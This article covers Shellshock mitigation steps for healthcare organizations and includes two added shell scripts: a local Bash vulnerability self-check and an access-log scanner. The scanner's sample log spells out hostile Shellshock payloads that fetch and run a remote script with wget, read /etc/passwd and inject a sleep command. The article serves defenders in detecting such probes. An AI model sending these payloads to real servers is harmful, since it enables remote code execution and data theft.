Shellshock: Healthcare Mitigation Steps
Expert Insights on a Breach Prevention Strategy
Healthcare organizations wondering why mitigating the Bash flaws known as Shellshock deserves urgent attention need only consider what happened to Community Health Systems earlier this year. Some experts believe Chinese hackers exploited the Heartbleed OpenSSL vulnerability to gain access to the data of 4.5 million patients of the hospital chain.
The concern now is that attackers may exploit a new, widespread vulnerability that healthcare institutions have yet to patch or mitigate. "While it's still being determined if Shellshock is as damaging as Heartbleed, it's certainly as serious," says Brian Evans, senior managing consultant at IBM Security Services.
So, healthcare organizations must mitigate the Shellshock vulnerability now to help avoid becoming the next mega-breach victim.
The National Health Information Sharing and Analysis Center says it's receiving reports that hackers are already targeting healthcare organizations, looking to take advantage of Shellshock.
"NH-ISAC has received reports of organizations being scanned for this vulnerability and seeing a high volume of traffic searching for the vulnerability, in some cases, in excess of 1,000 hits per hour," the organization tells Information Security Media Group. "This equates to high counts of attackers looking for opportunities to try and execute the code, and then transition to malware-based e-mails that look to exploit the vulnerability as well."
The Health Information Trust Alliance on Sept. 25 issued an alert on Shellshock "to ensure healthcare organizations are appropriately informed and taking steps to safeguard their systems and have sufficient information to communicate the background and implications to others in their organizations."
Daniel Nutkis, HITRUST CEO, tells ISMG: "We have also experienced an uptick in organizations reaching out with questions about the threat indicators ... but it's still too early to tell on the overall effectiveness of the response."
Shellshock refers to vulnerabilities in the Bourne-again shell, known as Bash. It's a command-line shell present in many flavors of Unix, including Linux distributions, more than 500 million Apache-based Web servers and Apple's Mac OS X. In other words, the shell exists all over the Internet, from Web servers and e-mail servers to physical security systems and beyond.
The flaws cause Bash to execute commands appended to a function definition passed in an environment variable, so any service that hands attacker-controlled input to Bash through the environment, such as a CGI script behind a Web server, can be made to run commands remotely. Attackers could therefore potentially take control of a healthcare system, dump all data stored on it, and launch automated worms that use the vulnerability to exploit every Bash-using system inside a network, security experts say. That's why they recommend all enterprises scan for Bash flaws, apply related patches wherever possible, and use virtual patching and similar controls to mitigate risk on systems that have yet to be patched by vendors.
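Before trusting a vendor's word that a host is fixed, a practitioner will want to test the Bash binary itself. The following is an added example, not from the article or from any vendor, that reproduces the widely circulated one-line tests for the two original Shellshock CVEs: CVE-2014-6271 (a command trailing a function definition in an environment variable is executed) and CVE-2014-7169 (the parser bug left by the incomplete first patch). It assumes a `bash` binary on the PATH; the `BASH_BIN` override is an assumed convenience for pointing the check at a specific binary.

```shell
#!/bin/sh
# Added example (not from the article): local Shellshock self-check.
# Mirrors the widely used one-line tests for CVE-2014-6271 and
# CVE-2014-7169. Assumes a `bash` binary on PATH; BASH_BIN is an assumed
# override for testing a specific binary (e.g. a vendor-supplied build).
BASH_BIN="${BASH_BIN:-bash}"

have_bash() {
    command -v "$BASH_BIN" >/dev/null 2>&1
}

# CVE-2014-6271: Bash imports a function definition from an environment
# variable and, when vulnerable, also runs the command that follows it.
check_cve_2014_6271() {
    have_bash || { echo "no-bash"; return 0; }
    out=$(env x='() { :;}; echo SHELLSHOCK_MARKER' "$BASH_BIN" -c 'echo probe' 2>/dev/null || true)
    case "$out" in
        *SHELLSHOCK_MARKER*) echo "vulnerable" ;;
        *)                   echo "patched" ;;
    esac
}

# CVE-2014-7169: the first patch left a parser bug; the leftover tokens
# ">\" turn the following "echo date" into a redirect, creating a file
# named "echo" in the working directory. Run in a scratch directory so a
# vulnerable host leaves no debris behind.
check_cve_2014_7169() {
    have_bash || { echo "no-bash"; return 0; }
    scratch=$(mktemp -d) || { echo "error"; return 0; }
    ( cd "$scratch" && env X='() { (a)=>\' "$BASH_BIN" -c 'echo date' >/dev/null 2>&1 ) || true
    if [ -e "$scratch/echo" ]; then echo "vulnerable"; else echo "patched"; fi
    rm -rf "$scratch"
}

# Overall verdict: vulnerable if either test trips.
shellshock_status() {
    a=$(check_cve_2014_6271)
    b=$(check_cve_2014_7169)
    case "$a$b" in
        *vulnerable*) echo "vulnerable" ;;
        *no-bash*)    echo "no-bash" ;;
        *error*)      echo "error" ;;
        *)            echo "patched" ;;
    esac
}

# Usage: print both results and the verdict for this host.
echo "CVE-2014-6271: $(check_cve_2014_6271)"
echo "CVE-2014-7169: $(check_cve_2014_7169)"
echo "verdict: $(shellshock_status)"
```

A "patched" verdict covers only these two CVEs; later Bash fixes closed further parser issues, so a host that passes should still receive the vendor's current package rather than being marked done. Appliances and medical devices that expose no shell cannot be checked this way, which is exactly why the inventory step matters.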
5 Steps to Take
While that's the general advice, IBM's Evans - and other experts - recommend healthcare organizations:
- Work with vendors to identify all systems that need patching, such as those running Unix, Linux, Mac OS X and, if the organization uses Cygwin, Windows as well.
- Include medical devices and network devices in that patching assessment.
- Patch Internet-facing systems first.
- Pay close attention to logs and network traffic in the coming weeks and months to quickly identify any potential compromised systems.
- Review the steps that business associates are taking to protect systems against critical vulnerabilities.
"Covered entities should ask their BAs for an official communication on what they are doing regarding the recent Shellshock/Bash issue and their timeline to address the vulnerability," Evans says.
In the Trenches
The University of Pittsburgh Medical Center is taking many of those steps, plus more, says John Houston, vice president of privacy and information security.
In dealing with any emerging vulnerability, UPMC performs environmental scans to identify vulnerable systems, applications and devices that need to be remediated, then also performs "double checks," he says.
"Our process is the same no matter what the vulnerability," Houston says. "But because the industry identified Shellshock as a critical vulnerability, the urgency is raised."
UPMC is applying patches available from vendors and demanding patches from some companies, such as medical equipment manufacturers, that have yet to provide them, Houston says.
In cases where no patch is yet available, the medical center is pursuing other mitigation steps, including using more intense monitoring of networks and systems, and ensuring - whenever possible - that unpatched systems aren't left exposed to the Internet, Houston explains.
"You have to make sure the perimeter is protected. Also, network traffic can be an indication of a vulnerability being exploited," he says. "You might see a [compromised] system phoning home for a computer. You look at traffic and see where it's occurring."
A continuing focus on improving its configuration management capabilities helped Beth Israel Deaconess Medical Center to quickly identify and patch potentially Shellshock-vulnerable systems in its data center, says Michael Yamamoto, lead security engineer at the Boston-based medical center.
"The most important step we took was to evaluate our publicly accessible systems and attempt to remediate [them]. We quickly developed custom signatures for our intrusion detection/intrusion protection and Web application firewall systems to help protect the environment, which were replaced with 'official signatures' once those were made available," he says.
"Patching and remediating major, publicly known-vulnerable systems was straightforward and easy," Yamamoto says. "Unlike Heartbleed, however, using automated scans to find systems which aren't yet known to be vulnerable is much more difficult. It's possible there will be many legacy embedded devices which will never have patches available."
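For the log-monitoring step and the custom IDS/WAF signatures Yamamoto describes, the following is an added example, not from the article or from BIDMC, of sweeping an Apache combined-format access log for Shellshock probe attempts and listing the hosts that sent them. The sample log lines are constructed for the example and use RFC 5737 documentation addresses. The `() {` prefix is what the exploit plants in headers such as User-Agent, Referer or Cookie; the script also catches its URL-encoded form in the request line.

```shell
#!/bin/sh
# Added example (not from the article): sweep an Apache combined-format
# access log for Shellshock probe attempts and list the source IPs.
# Matches the literal "() {" prefix (optional spaces) that the exploit
# plants in headers such as User-Agent, Referer or Cookie, and its
# URL-encoded form "%28%29%20%7B" in the request line.
PROBE_RE='[(][)][[:space:]]*[{]|%28%29(%20|[+])*%7[Bb]'

# Constructed sample log: two probes from one scanner, one clean request,
# and one URL-encoded probe in a query string. Addresses are RFC 5737
# documentation ranges, not real hosts.
write_sample_log() {
    cat >"$1" <<'EOF'
203.0.113.7 - - [25/Sep/2014:10:14:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://203.0.113.9/x -O /tmp/x; sh /tmp/x\""
198.51.100.4 - - [25/Sep/2014:10:14:05 +0000] "GET /index.html HTTP/1.1" 200 3041 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Sep/2014:10:14:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "() { :; }; echo; /bin/cat /etc/passwd" "-"
198.51.100.22 - - [25/Sep/2014:10:15:41 +0000] "GET /cgi-bin/php?%28%29%20%7B%20%3A%3B%7D%3B%20%2Fbin%2Fsleep%2010 HTTP/1.1" 403 199 "-" "curl/7.30.0"
EOF
}

# Print every log line carrying a probe (grep exits 1 on no match, which
# is not an error here).
scan_shellshock_probes() {
    grep -E "$PROBE_RE" "$1" || true
}

# Number of probe lines.
count_shellshock_probes() {
    grep -cE "$PROBE_RE" "$1" || true
}

# Distinct source addresses sending probes (first field of each line):
# the list to hand to the perimeter team and to check against egress logs
# for any host that later "phones home".
shellshock_probe_sources() {
    scan_shellshock_probes "$1" | awk '{ print $1 }' | sort -u
}

# Usage: build the sample log, report the hits and the scanning hosts.
LOG=$(mktemp)
write_sample_log "$LOG"
echo "probe lines: $(count_shellshock_probes "$LOG")"
scan_shellshock_probes "$LOG"
echo "sources:"
shellshock_probe_sources "$LOG"
rm -f "$LOG"
```

A hit in the log proves only that a probe arrived, not that it worked; the follow-up is to check whether the targeted host made an outbound connection to the scanner, or to anything unexpected, in the minutes after the request. Note also that the default Apache "common" log format does not record User-Agent or Referer, so a server logging in that format will show only the request-line variant and must be switched to the combined format (or watched at the IDS) to see the header-based probes.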
The key to addressing Shellshock, or any other "vulnerability of the week or month," UPMC's Houston says, is to have a methodical response plan in place, as well as to respond quickly, be nimble, and maintain a good inventory of all systems, software, and devices that could be at risk.
That means always keeping response teams on standby. "We deal with patching systems all the time, it's a regular occurrence, not a foreign event," he says. "Based on industry warnings, the criticality is higher with some vulnerabilities, such as Shellshock."